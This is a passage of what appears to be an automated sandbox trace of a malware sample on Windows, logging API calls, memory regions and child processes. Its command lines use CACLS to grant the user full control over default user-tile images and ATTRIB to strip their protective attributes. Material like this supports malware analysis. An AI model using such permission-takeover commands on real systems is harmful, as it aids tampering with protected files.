[0186.931] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2be4d8 [0186.931] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0186.932] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.932] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.932] GetConsoleTitleW (in: lpConsoleTitle=0x22f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.932] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef58 | out: lpAttributeList=0x22ee90, lpSize=0x22ef58) returned 1 [0186.932] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee90, lpPreviousValue=0x0) returned 1 [0186.932] GetStartupInfoW (in: lpStartupInfo=0x22ee4c | out: lpStartupInfo=0x22ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.932] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.932] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef38 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessInformation=0x22ef38*(hProcess=0x4c, hThread=0x50, dwProcessId=0x978, dwThreadId=0xf78)) returned 1 [0186.934] CloseHandle (hObject=0x50) returned 1 [0186.934] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.934] GetEnvironmentStringsW () returned 0x2c2410* [0186.934] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.934] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.980] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22ee2c | out: lpExitCode=0x22ee2c*=0x0) returned 1 [0186.980] CloseHandle (hObject=0x4c) returned 1 [0186.980] _vsnwprintf (in: _Buffer=0x22ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee38 | out: _Buffer="00000000") returned 8 [0186.980] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.980] GetEnvironmentStringsW () returned 0x2c2410* [0186.981] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.981] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.981] GetEnvironmentStringsW () returned 0x2c2410* [0186.981] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.981] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ee90 | out: lpAttributeList=0x22ee90) [0186.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.981] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.981] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.981] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.982] SetConsoleInputExeNameW () returned 0x1 [0186.982] GetConsoleOutputCP () returned 0x1b5 [0186.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.982] exit (_Code=0) Process: id = "389" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0xfac" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26918 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26919 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26920 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26921 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 26922 start_va = 0x820000 end_va = 0x828fff entry_point = 0x820000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26923 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26924 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26925 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26926 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26927 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26928 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26929 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26930 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26931 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 26932 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 26933 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26934 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26935 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26936 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26937 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26938 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 555 os_tid = 0x45c Thread: id = 556 os_tid = 0x90c Process: id = "390" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x978" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0xfac" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26940 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26941 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26942 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26943 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26944 start_va = 0xad0000 end_va = 0xad6fff entry_point = 0xad0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26945 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26946 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26947 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26948 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26949 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26952 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26953 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 26954 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 26955 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26957 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26960 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26961 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26962 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26963 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26964 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26965 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26966 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26967 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 26968 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26969 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 557 os_tid = 0xf78 Process: id = "391" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xefc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26970 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26971 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26972 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26973 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26974 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26975 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26976 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26977 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26978 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26979 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26980 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26981 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26982 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26983 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26984 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 26985 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26986 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26987 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26988 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26989 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26990 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26991 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26992 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26993 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26994 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26995 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26996 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26997 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26998 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26999 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27000 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27001 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 27002 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 27003 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 27004 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 558 os_tid = 0xfa4 [0187.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afbf4 | out: lpSystemTimeAsFileTime=0x2afbf4*(dwLowDateTime=0xa4667600, dwHighDateTime=0x1d440a9)) [0187.055] GetCurrentProcessId () returned 0xefc [0187.055] GetCurrentThreadId () returned 0xfa4 [0187.055] GetTickCount () returned 0x356a7 [0187.055] QueryPerformanceCounter (in: lpPerformanceCount=0x2afbec | out: lpPerformanceCount=0x2afbec*=24384415112) returned 1 [0187.056] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.056] __set_app_type (_Type=0x1) [0187.056] __p__fmode () returned 0x76b331f4 [0187.056] __p__commode () returned 0x76b331fc [0187.056] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.056] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.056] GetCurrentThreadId () returned 0xfa4 [0187.056] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa4) returned 0x38 [0187.056] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.056] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.056] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.056] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.056] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afb84 | out: phkResult=0x2afb84*=0x0) returned 0x2 [0187.056] VirtualQuery (in: lpAddress=0x2afbbb, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.057] GetConsoleOutputCP () returned 0x1b5 [0187.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.057] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.058] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.058] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.058] GetEnvironmentStringsW () returned 0x4b0308* [0187.058] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.058] GetEnvironmentStringsW () returned 0x4b0308* [0187.058] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeaf4 | out: phkResult=0x2aeaf4*=0x40) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", 